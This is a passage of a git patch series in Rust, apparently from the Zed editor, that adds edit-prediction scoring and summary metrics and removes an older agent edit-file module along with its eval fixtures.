match apply_diff_to_string(actual_patch, input.original_text) { + Ok(text) => text, + Err(_) => { + let mut score = PredictionScore::zero(); + score.inserted_tokens = token_changes.inserted_tokens; + score.deleted_tokens = token_changes.deleted_tokens; + return score; + } + }; + + let mut best_delta_chr_f_metrics = DeltaChrFMetrics::default(); + 
let mut best_expected_cursor = None; + let mut best_expected_text = None; + + for expected in input.expected_patches { + let delta_chr_f_metrics = delta_chr_f(input.original_text, &expected.text, &actual_text); + if delta_chr_f_metrics.score > best_delta_chr_f_metrics.score { + best_delta_chr_f_metrics = delta_chr_f_metrics; + best_expected_cursor = expected.cursor_editable_region_offset; + best_expected_text = Some(expected.text.as_str()); + } + } + + let disbalance_before = braces_disbalance(input.original_text); + let disbalance_after = braces_disbalance(&actual_text); + let braces_disbalance = disbalance_after.saturating_sub(disbalance_before); + + let best_exact_lines = input + .expected_patches + .iter() + .map(|expected| exact_lines_match(&expected.patch, actual_patch)) + .max_by_key(|metrics| metrics.true_positives) + .unwrap_or_default(); + + let reversal_ratio = input + .reversal_context + .map(|context| { + compute_prediction_reversal_ratio_from_history( + input.original_text, + context.edit_history, + context.excerpt_start_row, + &actual_text, + context.cursor_path, + ) + }) + .unwrap_or(0.0); + + let (cursor_distance, cursor_exact_match) = + compute_cursor_metrics(best_expected_cursor, input.actual_cursor); + + let wrong_editable_region = Some(!is_editable_region_correct(actual_patch)); + let has_isolated_whitespace_changes = + has_isolated_whitespace_changes(actual_patch, input.actual_cursor.map(|cursor| cursor.row)); + + let (kept_rate, recall_rate, kept_chars, correctly_deleted_chars, discarded_chars) = + best_expected_text + .map(|reference_text| { + let result = crate::kept_rate::compute_kept_rate( + input.original_text, + &actual_text, + reference_text, + ); + ( + Some(result.kept_rate), + Some(result.recall_rate), + Some(result.kept_chars), + Some(result.correctly_deleted_chars), + Some(result.discarded_chars), + ) + }) + .unwrap_or((None, None, None, None, None)); + + PredictionScore { + delta_chr_f: best_delta_chr_f_metrics.score as f32, + 
delta_chr_f_true_positives: best_delta_chr_f_metrics.counts.true_positives, + delta_chr_f_false_positives: best_delta_chr_f_metrics.counts.false_positives, + delta_chr_f_false_negatives: best_delta_chr_f_metrics.counts.false_negatives, + delta_chr_f_precision: best_delta_chr_f_metrics.precision, + delta_chr_f_recall: best_delta_chr_f_metrics.recall, + delta_chr_f_beta: best_delta_chr_f_metrics.beta, + braces_disbalance, + exact_lines_tp: best_exact_lines.true_positives, + exact_lines_fp: best_exact_lines.false_positives, + exact_lines_fn: best_exact_lines.false_negatives, + reversal_ratio, + cursor_distance, + cursor_exact_match, + wrong_editable_region, + has_isolated_whitespace_changes, + inserted_tokens: token_changes.inserted_tokens, + deleted_tokens: token_changes.deleted_tokens, + kept_rate, + recall_rate, + kept_chars, + correctly_deleted_chars, + discarded_chars, + cumulative_logprob: input.cumulative_logprob, + avg_logprob: input.avg_logprob, + } +} + +fn compute_cursor_metrics( + expected_cursor_editable_region_offset: Option, + actual_cursor: Option, +) -> (Option, Option) { + match (expected_cursor_editable_region_offset, actual_cursor) { + (Some(expected), Some(actual)) => { + let distance = expected.abs_diff(actual.editable_region_offset.unwrap_or_default()); + let exact_match = distance == 0; + (Some(distance), Some(exact_match)) + } + (None, None) => (None, None), + (Some(_), None) | (None, Some(_)) => (None, Some(false)), + } +} diff --git a/crates/edit_prediction_metrics/src/summary.rs b/crates/edit_prediction_metrics/src/summary.rs new file mode 100644 index 00000000000000..249ae185755db5 --- /dev/null +++ b/crates/edit_prediction_metrics/src/summary.rs @@ -0,0 +1,293 @@ +use serde::Serialize; + +use crate::patch_metrics::ClassificationMetrics; +use crate::prediction_score::PredictionScore; + +#[derive(Clone, Copy, Debug, Default)] +pub struct QaSummaryData { + pub reverts_edits: Option, + pub confidence: Option, +} + +#[derive(Clone, Copy, 
Debug)] +pub struct PredictionSummaryInput<'a> { + pub score: &'a PredictionScore, + pub qa: Option, +} + +#[derive(Clone, Debug, Serialize)] +pub struct SummaryJson { + pub total_examples: usize, + pub avg_delta_chr_f: f32, + pub delta_chr_f_beta: f64, + pub delta_chr_f_true_positives: usize, + pub delta_chr_f_false_positives: usize, + pub delta_chr_f_false_negatives: usize, + pub delta_chr_f_precision: f64, + pub delta_chr_f_recall: f64, + pub avg_braces_disbalance: f32, + pub exact_lines_true_positives: usize, + pub exact_lines_false_positives: usize, + pub exact_lines_false_negatives: usize, + pub exact_lines_precision: f64, + pub exact_lines_recall: f64, + pub exact_lines_f1: f64, + pub avg_reversal_ratio: f32, + #[serde(skip_serializing_if = "Option::is_none")] + pub qa_avg_reverts_edits: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub qa_avg_confidence: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub cursor_exact_match_rate: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub cursor_avg_distance: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub cursor_total_evaluated: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub wrong_editable_region_rate: Option, + pub isolated_whitespace_rate: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub avg_kept_rate: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub avg_recall_rate: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub total_kept_chars: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub total_correctly_deleted_chars: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub total_discarded_chars: Option, +} + +pub fn compute_summary<'a>( + predictions: impl IntoIterator>, +) -> SummaryJson { + let mut all_delta_chr_f_scores = Vec::new(); + let mut all_reversal_ratios = Vec::new(); + let mut braces_disbalance_sum: usize = 0; + let mut total_delta_chr_f = 
ClassificationMetrics::default(); + let mut total_delta_chr_f_precision = 0.0; + let mut total_delta_chr_f_recall = 0.0; + let mut delta_chr_f_beta = 0.0; + let mut total_exact_lines = ClassificationMetrics::default(); + let mut total_scores: usize = 0; + let mut qa_reverts_count: usize = 0; + let mut qa_reverts_total: usize = 0; + let mut qa_confidence_sum: u64 = 0; + let mut qa_confidence_count: usize = 0; + let mut cursor_exact_matches: usize = 0; + let mut cursor_total: usize = 0; + let mut cursor_distance_sum: usize = 0; + let mut cursor_distance_count: usize = 0; + let mut wrong_editable_region_count: usize = 0; + let mut wrong_editable_region_total: usize = 0; + let mut isolated_whitespace_count: usize = 0; + let mut kept_rate_sum: f64 = 0.0; + let mut kept_rate_count: usize = 0; + let mut kept_chars_total: usize = 0; + let mut kept_chars_count: usize = 0; + let mut correctly_deleted_chars_total: usize = 0; + let mut correctly_deleted_chars_count: usize = 0; + let mut discarded_chars_total: usize = 0; + let mut discarded_chars_count: usize = 0; + let mut recall_rate_sum: f64 = 0.0; + let mut recall_rate_count: usize = 0; + + for prediction in predictions { + let score = prediction.score; + + all_delta_chr_f_scores.push(score.delta_chr_f); + all_reversal_ratios.push(score.reversal_ratio); + total_scores += 1; + braces_disbalance_sum += score.braces_disbalance; + total_delta_chr_f.accumulate(&score.delta_chr_f_counts()); + total_delta_chr_f_precision += score.delta_chr_f_precision; + total_delta_chr_f_recall += score.delta_chr_f_recall; + delta_chr_f_beta = score.delta_chr_f_beta; + total_exact_lines.accumulate(&score.exact_lines_counts()); + + if let Some(qa) = prediction.qa { + if let Some(reverts) = qa.reverts_edits { + qa_reverts_total += 1; + if reverts { + qa_reverts_count += 1; + } + } + if let Some(confidence) = qa.confidence { + qa_confidence_sum += confidence as u64; + qa_confidence_count += 1; + } + } + + if let Some(wrong) = 
score.wrong_editable_region { + wrong_editable_region_total += 1; + if wrong { + wrong_editable_region_count += 1; + } + } + + if score.has_isolated_whitespace_changes { + isolated_whitespace_count += 1; + } + + if let Some(kept_rate) = score.kept_rate { + kept_rate_sum += kept_rate; + kept_rate_count += 1; + } + if let Some(kept_chars) = score.kept_chars { + kept_chars_total += kept_chars; + kept_chars_count += 1; + } + if let Some(correctly_deleted_chars) = score.correctly_deleted_chars { + correctly_deleted_chars_total += correctly_deleted_chars; + correctly_deleted_chars_count += 1; + } + if let Some(discarded_chars) = score.discarded_chars { + discarded_chars_total += discarded_chars; + discarded_chars_count += 1; + } + if let Some(recall_rate) = score.recall_rate { + recall_rate_sum += recall_rate; + recall_rate_count += 1; + } + + if let Some(exact_match) = score.cursor_exact_match { + cursor_total += 1; + if exact_match { + cursor_exact_matches += 1; + } + } + if let Some(distance) = score.cursor_distance { + cursor_distance_sum += distance; + cursor_distance_count += 1; + } + } + + let avg_delta_chr_f = if all_delta_chr_f_scores.is_empty() { + 0.0 + } else { + all_delta_chr_f_scores.iter().sum::() / all_delta_chr_f_scores.len() as f32 + }; + + let avg_reversal_ratio = if all_reversal_ratios.is_empty() { + 0.0 + } else { + all_reversal_ratios.iter().sum::() / all_reversal_ratios.len() as f32 + }; + + let avg_braces_disbalance = if total_scores == 0 { + 0.0 + } else { + braces_disbalance_sum as f32 / total_scores as f32 + }; + + let qa_avg_reverts_edits = if qa_reverts_total > 0 { + Some(qa_reverts_count as f32 / qa_reverts_total as f32) + } else { + None + }; + + let qa_avg_confidence = if qa_confidence_count > 0 { + Some(qa_confidence_sum as f32 / qa_confidence_count as f32) + } else { + None + }; + + let cursor_exact_match_rate = if cursor_total > 0 { + Some(cursor_exact_matches as f32 / cursor_total as f32) + } else { + None + }; + + let 
cursor_avg_distance = if cursor_distance_count > 0 { + Some(cursor_distance_sum as f32 / cursor_distance_count as f32) + } else { + None + }; + + let cursor_total_evaluated = if cursor_total > 0 { + Some(cursor_total) + } else { + None + }; + + let wrong_editable_region_rate = if wrong_editable_region_total > 0 { + Some(wrong_editable_region_count as f32 / wrong_editable_region_total as f32) + } else { + None + }; + + let isolated_whitespace_rate = if total_scores > 0 { + Some(isolated_whitespace_count as f32 / total_scores as f32) + } else { + None + }; + + let avg_kept_rate = if kept_rate_count > 0 { + Some(kept_rate_sum / kept_rate_count as f64) + } else { + None + }; + + let avg_recall_rate = if recall_rate_count > 0 { + Some(recall_rate_sum / recall_rate_count as f64) + } else { + None + }; + + let total_kept_chars = if kept_chars_count > 0 { + Some(kept_chars_total) + } else { + None + }; + + let total_correctly_deleted_chars = if correctly_deleted_chars_count > 0 { + Some(correctly_deleted_chars_total) + } else { + None + }; + + let total_discarded_chars = if discarded_chars_count > 0 { + Some(discarded_chars_total) + } else { + None + }; + + SummaryJson { + total_examples: total_scores, + avg_delta_chr_f, + delta_chr_f_beta, + delta_chr_f_true_positives: total_delta_chr_f.true_positives, + delta_chr_f_false_positives: total_delta_chr_f.false_positives, + delta_chr_f_false_negatives: total_delta_chr_f.false_negatives, + delta_chr_f_precision: if total_scores == 0 { + 0.0 + } else { + total_delta_chr_f_precision / total_scores as f64 + }, + delta_chr_f_recall: if total_scores == 0 { + 0.0 + } else { + total_delta_chr_f_recall / total_scores as f64 + }, + avg_braces_disbalance, + exact_lines_true_positives: total_exact_lines.true_positives, + exact_lines_false_positives: total_exact_lines.false_positives, + exact_lines_false_negatives: total_exact_lines.false_negatives, + exact_lines_precision: total_exact_lines.precision(), + exact_lines_recall: 
total_exact_lines.recall(), + exact_lines_f1: total_exact_lines.f1(), + avg_reversal_ratio, + qa_avg_reverts_edits, + qa_avg_confidence, + cursor_exact_match_rate, + cursor_avg_distance, + cursor_total_evaluated, + wrong_editable_region_rate, + isolated_whitespace_rate, + avg_kept_rate, + avg_recall_rate, + total_kept_chars, + total_correctly_deleted_chars, + total_discarded_chars, + } +} From aa5130594dfba0d8d2687d8bcb8eba08455d40cb Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 4 May 2026 11:54:39 +0200 Subject: [PATCH 151/231] agent: Remove old edit file tool (#55612) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - agent: Improve reliability when LLM edits file --- .zed/settings.json | 1 - Cargo.lock | 1 - crates/agent/Cargo.toml | 1 - crates/agent/src/agent.rs | 1 - crates/agent/src/edit_agent.rs | 1527 -- .../src/edit_agent/create_file_parser.rs | 237 - crates/agent/src/edit_agent/edit_parser.rs | 1094 - crates/agent/src/edit_agent/evals.rs | 1701 -- .../fixtures/add_overwrite_test/before.rs | 1572 -- .../fixtures/delete_run_git_blame/after.rs | 328 - .../fixtures/delete_run_git_blame/before.rs | 371 - .../disable_cursor_blinking/before.rs | 21344 ---------------- .../disable_cursor_blinking/possible-01.diff | 28 - .../disable_cursor_blinking/possible-02.diff | 29 - .../disable_cursor_blinking/possible-03.diff | 34 - .../disable_cursor_blinking/possible-04.diff | 33 - .../extract_handle_command_output/before.rs | 371 - .../possible-01.diff | 11 - .../possible-02.diff | 26 - .../possible-03.diff | 11 - .../possible-04.diff | 24 - .../possible-05.diff | 26 - .../possible-06.diff | 
23 - .../possible-07.diff | 26 - .../possible-08.diff | 26 - .../from_pixels_constructor/before.rs | 339 - .../fixtures/translate_doc_comments/before.rs | 339 - .../before.rs | 1629 -- .../edit_agent/evals/fixtures/zode/prompt.md | 2193 -- .../edit_agent/evals/fixtures/zode/react.py | 14 - .../evals/fixtures/zode/react_test.py | 271 - .../agent/src/tests/edit_file_thread_test.rs | 407 - crates/agent/src/tests/mod.rs | 16 +- crates/agent/src/thread.rs | 32 +- crates/agent/src/tool_permissions.rs | 4 +- crates/agent/src/tools.rs | 2 - crates/agent/src/tools/edit_file_tool.rs | 4501 +++- .../edit_file_tool}/reindent.rs | 0 .../streaming_fuzzy_matcher.rs | 0 .../src/tools/evals/streaming_edit_file.rs | 26 +- .../src/tools/streaming_edit_file_tool.rs | 4410 ---- 41 files changed, 3166 insertions(+), 39863 deletions(-) delete mode 100644 crates/agent/src/edit_agent.rs delete mode 100644 crates/agent/src/edit_agent/create_file_parser.rs delete mode 100644 crates/agent/src/edit_agent/edit_parser.rs delete mode 100644 crates/agent/src/edit_agent/evals.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/add_overwrite_test/before.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/after.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/before.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-01.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-02.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-03.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-04.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/before.rs delete mode 100644 
crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-01.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-02.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-03.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-04.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-05.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-06.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-07.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-08.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/from_pixels_constructor/before.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/translate_doc_comments/before.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/zode/prompt.md delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/zode/react.py delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/zode/react_test.py delete mode 100644 crates/agent/src/tests/edit_file_thread_test.rs rename crates/agent/src/{edit_agent => tools/edit_file_tool}/reindent.rs (100%) rename crates/agent/src/{edit_agent => tools/edit_file_tool}/streaming_fuzzy_matcher.rs (100%) delete mode 100644 crates/agent/src/tools/streaming_edit_file_tool.rs diff --git a/.zed/settings.json b/.zed/settings.json index 2ecbd5623d26bd..521cf786abe135 100644 --- a/.zed/settings.json +++ b/.zed/settings.json @@ -57,7 +57,6 @@ "remove_trailing_whitespace_on_save": true, "ensure_final_newline_on_save": true, "file_scan_exclusions": [ - 
"crates/agent/src/edit_agent/evals/fixtures", "crates/agent/src/tools/evals/fixtures", "**/.git", "**/.svn", diff --git a/Cargo.lock b/Cargo.lock index ecd69e00070657..406d9f450bd6d8 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -163,7 +163,6 @@ dependencies = [ "context_server", "ctor", "db", - "derive_more", "editor", "env_logger 0.11.8", "eval_utils", diff --git a/crates/agent/Cargo.toml b/crates/agent/Cargo.toml index ce472fd9e36ee9..13172212064e3f 100644 --- a/crates/agent/Cargo.toml +++ b/crates/agent/Cargo.toml @@ -31,7 +31,6 @@ cloud_llm_client.workspace = true collections.workspace = true context_server.workspace = true db.workspace = true -derive_more.workspace = true feature_flags.workspace = true fs.workspace = true futures.workspace = true diff --git a/crates/agent/src/agent.rs b/crates/agent/src/agent.rs index 45da8c92169a29..1a7aaffb58053d 100644 --- a/crates/agent/src/agent.rs +++ b/crates/agent/src/agent.rs @@ -1,5 +1,4 @@ mod db; -mod edit_agent; mod legacy_thread; mod native_agent_server; pub mod outline; diff --git a/crates/agent/src/edit_agent.rs b/crates/agent/src/edit_agent.rs deleted file mode 100644 index afaa124de066d9..00000000000000 --- a/crates/agent/src/edit_agent.rs +++ /dev/null @@ -1,1527 +0,0 @@ -mod create_file_parser; -mod edit_parser; -#[cfg(all(test, feature = "unit-eval"))] -mod evals; -pub mod reindent; -pub mod streaming_fuzzy_matcher; - -use crate::{Template, Templates}; -use action_log::ActionLog; -use anyhow::Result; -use create_file_parser::{CreateFileParser, CreateFileParserEvent}; -pub use edit_parser::EditFormat; -use edit_parser::{EditParser, EditParserEvent, EditParserMetrics}; -use futures::{ - Stream, StreamExt, - channel::mpsc::{self, UnboundedReceiver}, - pin_mut, - stream::BoxStream, -}; -use gpui::{AppContext, AsyncApp, Entity, Task}; -use language::{Anchor, Buffer, BufferSnapshot, LineIndent, Point, TextBufferSnapshot}; -use language_model::{ - CompletionIntent, LanguageModel, LanguageModelCompletionError, 
LanguageModelRequest, - LanguageModelRequestMessage, LanguageModelToolChoice, MessageContent, Role, -}; -use project::{AgentLocation, Project}; -use reindent::{IndentDelta, Reindenter}; -use schemars::JsonSchema; -use serde::{Deserialize, Serialize}; -use std::{mem, ops::Range, pin::Pin, sync::Arc, task::Poll}; -use streaming_diff::{CharOperation, StreamingDiff}; -use streaming_fuzzy_matcher::StreamingFuzzyMatcher; - -#[derive(Serialize)] -struct CreateFilePromptTemplate { - path: Option, - edit_description: String, -} - -impl Template for CreateFilePromptTemplate { - const TEMPLATE_NAME: &'static str = "create_file_prompt.hbs"; -} - -#[derive(Serialize)] -struct EditFileXmlPromptTemplate { - path: Option, - edit_description: String, -} - -impl Template for EditFileXmlPromptTemplate { - const TEMPLATE_NAME: &'static str = "edit_file_prompt_xml.hbs"; -} - -#[derive(Serialize)] -struct EditFileDiffFencedPromptTemplate { - path: Option, - edit_description: String, -} - -impl Template for EditFileDiffFencedPromptTemplate { - const TEMPLATE_NAME: &'static str = "edit_file_prompt_diff_fenced.hbs"; -} - -#[derive(Clone, Debug, PartialEq, Eq)] -pub enum EditAgentOutputEvent { - ResolvingEditRange(Range), - UnresolvedEditRange, - AmbiguousEditRange(Vec>), - Edited(Range), -} - -#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] -pub struct EditAgentOutput { - pub raw_edits: String, - pub parser_metrics: EditParserMetrics, -} - -#[derive(Clone)] -pub struct EditAgent { - model: Arc, - action_log: Entity, - project: Entity, - templates: Arc, - edit_format: EditFormat, - thinking_allowed: bool, - update_agent_location: bool, -} - -impl EditAgent { - pub fn new( - model: Arc, - project: Entity, - action_log: Entity, - templates: Arc, - edit_format: EditFormat, - allow_thinking: bool, - update_agent_location: bool, - ) -> Self { - EditAgent { - model, - project, - action_log, - templates, - edit_format, - thinking_allowed: allow_thinking, - update_agent_location, - } - 
} - - pub fn overwrite( - &self, - buffer: Entity, - edit_description: String, - conversation: &LanguageModelRequest, - cx: &mut AsyncApp, - ) -> ( - Task>, - mpsc::UnboundedReceiver, - ) { - let this = self.clone(); - let (events_tx, events_rx) = mpsc::unbounded(); - let conversation = conversation.clone(); - let output = cx.spawn(async move |cx| { - let snapshot = buffer.read_with(cx, |buffer, _| buffer.snapshot()); - let path = cx.update(|cx| snapshot.resolve_file_path(true, cx)); - let prompt = CreateFilePromptTemplate { - path, - edit_description, - } - .render(&this.templates)?; - let new_chunks = this - .request(conversation, CompletionIntent::CreateFile, prompt, cx) - .await?; - - let (output, mut inner_events) = this.overwrite_with_chunks(buffer, new_chunks, cx); - while let Some(event) = inner_events.next().await { - events_tx.unbounded_send(event).ok(); - } - output.await - }); - (output, events_rx) - } - - fn overwrite_with_chunks( - &self, - buffer: Entity, - edit_chunks: impl 'static + Send + Stream>, - cx: &mut AsyncApp, - ) -> ( - Task>, - mpsc::UnboundedReceiver, - ) { - let (output_events_tx, output_events_rx) = mpsc::unbounded(); - let (parse_task, parse_rx) = Self::parse_create_file_chunks(edit_chunks, cx); - let this = self.clone(); - let task = cx.spawn(async move |cx| { - this.action_log - .update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); - this.overwrite_with_chunks_internal(buffer, parse_rx, output_events_tx, cx) - .await?; - parse_task.await - }); - (task, output_events_rx) - } - - async fn overwrite_with_chunks_internal( - &self, - buffer: Entity, - mut parse_rx: UnboundedReceiver>, - output_events_tx: mpsc::UnboundedSender, - cx: &mut AsyncApp, - ) -> Result<()> { - let buffer_id = cx.update(|cx| { - let buffer_id = buffer.read(cx).remote_id(); - if self.update_agent_location { - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: 
language::Anchor::min_for_buffer(buffer_id), - }), - cx, - ) - }); - } - buffer_id - }); - - let send_edit_event = || { - output_events_tx - .unbounded_send(EditAgentOutputEvent::Edited( - Anchor::min_max_range_for_buffer(buffer_id), - )) - .ok() - }; - let set_agent_location = |cx: &mut _| { - if self.update_agent_location { - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::max_for_buffer(buffer_id), - }), - cx, - ) - }) - } - }; - let mut first_chunk = true; - while let Some(event) = parse_rx.next().await { - match event? { - CreateFileParserEvent::NewTextChunk { chunk } => { - cx.update(|cx| { - buffer.update(cx, |buffer, cx| { - if mem::take(&mut first_chunk) { - buffer.set_text(chunk, cx) - } else { - buffer.append(chunk, cx) - } - }); - self.action_log - .update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - set_agent_location(cx); - }); - send_edit_event(); - } - } - } - - if first_chunk { - cx.update(|cx| { - buffer.update(cx, |buffer, cx| buffer.set_text("", cx)); - self.action_log - .update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - set_agent_location(cx); - }); - send_edit_event(); - } - - Ok(()) - } - - pub fn edit( - &self, - buffer: Entity, - edit_description: String, - conversation: &LanguageModelRequest, - cx: &mut AsyncApp, - ) -> ( - Task>, - mpsc::UnboundedReceiver, - ) { - let this = self.clone(); - let (events_tx, events_rx) = mpsc::unbounded(); - let conversation = conversation.clone(); - let edit_format = self.edit_format; - let output = cx.spawn(async move |cx| { - let snapshot = buffer.read_with(cx, |buffer, _| buffer.snapshot()); - let path = cx.update(|cx| snapshot.resolve_file_path(true, cx)); - let prompt = match edit_format { - EditFormat::XmlTags => EditFileXmlPromptTemplate { - path, - edit_description, - } - .render(&this.templates)?, - EditFormat::DiffFenced => EditFileDiffFencedPromptTemplate { - path, - 
edit_description, - } - .render(&this.templates)?, - }; - - let edit_chunks = this - .request(conversation, CompletionIntent::EditFile, prompt, cx) - .await?; - this.apply_edit_chunks(buffer, edit_chunks, events_tx, cx) - .await - }); - (output, events_rx) - } - - async fn apply_edit_chunks( - &self, - buffer: Entity, - edit_chunks: impl 'static + Send + Stream>, - output_events: mpsc::UnboundedSender, - cx: &mut AsyncApp, - ) -> Result { - self.action_log - .update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - - let (output, edit_events) = Self::parse_edit_chunks(edit_chunks, self.edit_format, cx); - let mut edit_events = edit_events.peekable(); - while let Some(edit_event) = Pin::new(&mut edit_events).peek().await { - // Skip events until we're at the start of a new edit. - let Ok(EditParserEvent::OldTextChunk { .. }) = edit_event else { - edit_events.next().await.unwrap()?; - continue; - }; - - let snapshot = buffer.read_with(cx, |buffer, _| buffer.snapshot()); - - // Resolve the old text in the background, updating the agent - // location as we keep refining which range it corresponds to. - let (resolve_old_text, mut old_range) = - Self::resolve_old_text(snapshot.text.clone(), edit_events, cx); - while let Ok(old_range) = old_range.recv().await { - if let Some(old_range) = old_range { - let old_range = snapshot.anchor_before(old_range.start) - ..snapshot.anchor_before(old_range.end); - if self.update_agent_location { - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: old_range.end, - }), - cx, - ); - }); - } - output_events - .unbounded_send(EditAgentOutputEvent::ResolvingEditRange(old_range)) - .ok(); - } - } - - let (edit_events_, mut resolved_old_text) = resolve_old_text.await?; - edit_events = edit_events_; - - // If we can't resolve the old text, restart the loop waiting for a - // new edit (or for the stream to end). 
- let resolved_old_text = match resolved_old_text.len() { - 1 => resolved_old_text.pop().unwrap(), - 0 => { - output_events - .unbounded_send(EditAgentOutputEvent::UnresolvedEditRange) - .ok(); - continue; - } - _ => { - let ranges = resolved_old_text - .into_iter() - .map(|text| { - let start_line = - (snapshot.offset_to_point(text.range.start).row + 1) as usize; - let end_line = - (snapshot.offset_to_point(text.range.end).row + 1) as usize; - start_line..end_line - }) - .collect(); - output_events - .unbounded_send(EditAgentOutputEvent::AmbiguousEditRange(ranges)) - .ok(); - continue; - } - }; - - // Compute edits in the background and apply them as they become - // available. - let (compute_edits, edits) = - Self::compute_edits(snapshot, resolved_old_text, edit_events, cx); - let mut edits = edits.ready_chunks(32); - while let Some(edits) = edits.next().await { - if edits.is_empty() { - continue; - } - - // Edit the buffer and report edits to the action log as part of the - // same effect cycle, otherwise the edit will be reported as if the - // user made it. 
- let (min_edit_start, max_edit_end) = cx.update(|cx| { - let (min_edit_start, max_edit_end) = buffer.update(cx, |buffer, cx| { - buffer.edit(edits.iter().cloned(), None, cx); - let max_edit_end = buffer - .summaries_for_anchors::( - edits.iter().map(|(range, _)| range.end), - ) - .max() - .unwrap(); - let min_edit_start = buffer - .summaries_for_anchors::( - edits.iter().map(|(range, _)| range.start), - ) - .min() - .unwrap(); - ( - buffer.anchor_after(min_edit_start), - buffer.anchor_before(max_edit_end), - ) - }); - self.action_log - .update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - if self.update_agent_location { - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: max_edit_end, - }), - cx, - ); - }); - } - (min_edit_start, max_edit_end) - }); - output_events - .unbounded_send(EditAgentOutputEvent::Edited(min_edit_start..max_edit_end)) - .ok(); - } - - edit_events = compute_edits.await?; - } - - output.await - } - - fn parse_edit_chunks( - chunks: impl 'static + Send + Stream>, - edit_format: EditFormat, - cx: &mut AsyncApp, - ) -> ( - Task>, - UnboundedReceiver>, - ) { - let (tx, rx) = mpsc::unbounded(); - let output = cx.background_spawn(async move { - pin_mut!(chunks); - - let mut parser = EditParser::new(edit_format); - let mut raw_edits = String::new(); - while let Some(chunk) = chunks.next().await { - match chunk { - Ok(chunk) => { - raw_edits.push_str(&chunk); - for event in parser.push(&chunk) { - tx.unbounded_send(Ok(event))?; - } - } - Err(error) => { - tx.unbounded_send(Err(error.into()))?; - } - } - } - Ok(EditAgentOutput { - raw_edits, - parser_metrics: parser.finish(), - }) - }); - (output, rx) - } - - fn parse_create_file_chunks( - chunks: impl 'static + Send + Stream>, - cx: &mut AsyncApp, - ) -> ( - Task>, - UnboundedReceiver>, - ) { - let (tx, rx) = mpsc::unbounded(); - let output = cx.background_spawn(async move { - pin_mut!(chunks); - - let mut 
parser = CreateFileParser::new(); - let mut raw_edits = String::new(); - while let Some(chunk) = chunks.next().await { - match chunk { - Ok(chunk) => { - raw_edits.push_str(&chunk); - for event in parser.push(Some(&chunk)) { - tx.unbounded_send(Ok(event))?; - } - } - Err(error) => { - tx.unbounded_send(Err(error.into()))?; - } - } - } - // Send final events with None to indicate completion - for event in parser.push(None) { - tx.unbounded_send(Ok(event))?; - } - Ok(EditAgentOutput { - raw_edits, - parser_metrics: EditParserMetrics::default(), - }) - }); - (output, rx) - } - - fn resolve_old_text( - snapshot: TextBufferSnapshot, - mut edit_events: T, - cx: &mut AsyncApp, - ) -> ( - Task)>>, - watch::Receiver>>, - ) - where - T: 'static + Send + Unpin + Stream>, - { - let (mut old_range_tx, old_range_rx) = watch::channel(None); - let task = cx.background_spawn(async move { - let mut matcher = StreamingFuzzyMatcher::new(snapshot); - while let Some(edit_event) = edit_events.next().await { - let EditParserEvent::OldTextChunk { - chunk, - done, - line_hint, - } = edit_event? 
